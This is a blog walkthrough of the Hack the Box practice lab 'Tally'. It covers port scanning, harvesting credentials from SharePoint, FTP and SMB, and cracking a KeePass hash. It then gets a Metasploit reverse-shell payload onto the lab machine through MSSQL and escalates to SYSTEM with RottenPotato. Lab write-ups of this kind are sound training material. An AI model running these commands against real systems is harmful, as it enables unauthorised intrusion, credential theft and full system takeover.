Hello Friends!! Today we are going to solve a CTF
Challenge “Tally”. It is a lab that is developed by Hack the Box. They have an
amazing collection of Online Labs, on which you can practice your penetration
testing skills. They have labs are designed for beginner to the Expert
penetration tester. Tally is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the
vulnerable Lab.
Let’s Begin!!
As these labs are only available online, therefore, they
have a static IP. Tally Lab has IP: 10.10.10.59.
Now, as always let’s begin our hacking with the port
enumeration.
nmap -p- -A 10.10.10.59
When you will explore target IP through the browser, it will
be redirected to a SharePoint page as shown below which also declared by nmap in
above image.
Then we have used several
directory brute-forcer tools in order to enumerate some useful URL for web
directory but failed to retrieve. Then I penetrate for the web directory manually
with the help of Google search and slowly and gradually reached at /sitepages/FinanceTeam.aspx and found
ftp username as shown below in the image.
Moreover, I found a link
for SharePoint directory brute-force attack that helps me in my next step.
We found this URL http://10.10.10.59/shared
documents/forms/allitems.aspx from inside above-given link, and when you will open above path in your browser as
shown below, you will see a file named "ftp-details". Download this
doc file and open it.
You will get a password from inside ftp details doc file.
Now login into FTP using following credentials and download tim.kdbx in your local machine.
Username:
ftp_user
Password: UTDRSCH53c"$6hys
Since the file contains .kdbx extension and I don't know
much about it, therefore, I jumped for Google search from there I got this link
to download a python script that extracts a HashCat/john crackable hash from
KeePass 1.x/2.X databases.
python
keepass2john.py tim.kdbx > tim
Next, we have used John the ripper for decrypting the
content of “tim" with help of the following command.
john --format=KeePass
--wordlist=/usr/share/wordlists/rockyou.txt tim
When you will obtain the password for “keepass2” which is an
application used for hiding passwords of your system then you need to install
it (keepass2) using the following command:
apt-get install
keepass2 -y
After installing, run the below command and submit “simplementeyo"
in the field of the master key.
keepass2 tim.kdbx
Then you can find username and password from inside
/Work/Windows/Shares for sharing a file through SMB login, since port 135-445
are open in targets machine for sharing files.
Here the password is hidden inside * character; copy and paste it into a text file
and you will get the password into plain letters I.e. Acc0unting .
Now you are having SMB login credential “Finance: Acc0unting”, then execute
following command for connecting with targets network and It will show “ACCT”
as sharename.
smbclient -L
10.10.10.59 -U Finance
Further type below commands and at last when you found
conn-info.txt, download it.
smbclient
//10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt
When you will download conn-info.txt file, open it, it will
tell you MSSQL database login credential.
db: sa
pass:
YE%TJC%&HYbe5Nw
From below image you can observe that, it was old server
details and might be the password for sa has been changed now.
Again login into SMB and look for next hint by moving into /zz_Migration, for that you need to
execute below commands:
smbclient
//10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New
folder"
Here you will found tester.exe, download it.
get tester.exe
You will get tester.exe inside
your /root directory since the file is too large, it is impossible to find
desirable information from that. Therefore use grep along with strings command.
strings tester.exe |
grep DATABASE
And you will get a new password for user sa as shown in
below image.
For next step I took help from our previous
article which was on MSSQL penetration testing. Open a new terminal and load
metasploit framework and execute below commands.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload
windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost
10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost
10.10.14.28
msf exploit(multi/script/web_delivery) > exploit
Copy the
highlighted text for .dll and Paste
it inside as CMD command as shown in next image.
Now open new terminal and again load a new metasploit
framework and execute below commands.
use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password
GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste
above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit
You will get meterpreter session of victim’s machine in your
1st metasploit framework and after then finished the task by grabbing
user.txt and root.txt file. Further type following:
getuid
So currently we don’t have NT AUTHORITY\SYSTEM permission.
But we have successfully grabbed user.txt file from inside
/Sarah/Desktop.
cd Sarah/Desktop
ls
cat user.txt
In this way we have completed our first task. Now let's find
root.txt!!
load incognito
Incognito option in meterpreter session was originally a
stand-alone application that permitted you to impersonate user tokens when
successfully compromising a system. And then we need to do first is
identify if there are any valid tokens on this system
list_token -u
If we talk related to impersonate token then you can see
currently there is no token available.
Then I took help from Google in such scenario and found a
link for downloading Rottenpotato
from github for privilege escalation.
git clone
https://github.com/foxglovesec/RottenPotato.git
After downloading it will give rottenpotato.exe file.
Upload the exe file into victim's machine.
upload
/root/Desktop/RottenPotato/rottenpotato.exe .
Now type below command for executing exe file and then add
SYSTEM token under impersonate user tokens.
execute -Hc -f
rottenpotato.exe
impersonate_token
"NT AUTHORITY\\SYSTEM"
After then when you will run getuid command again, it will tell you that you have escalated NT
AUTHORITY\\SYSTEM
Then come back to /Users directory and perceive available
directories inside it. You will get root.txt form inside C:\Users\Administrator\Desktop
go and grab it, and finished the task.
cd Administrator
cd Desktop
ls
cat root.txt
Fabulous!! The task has been completed and
hacked this box.
0 comments:
Post a Comment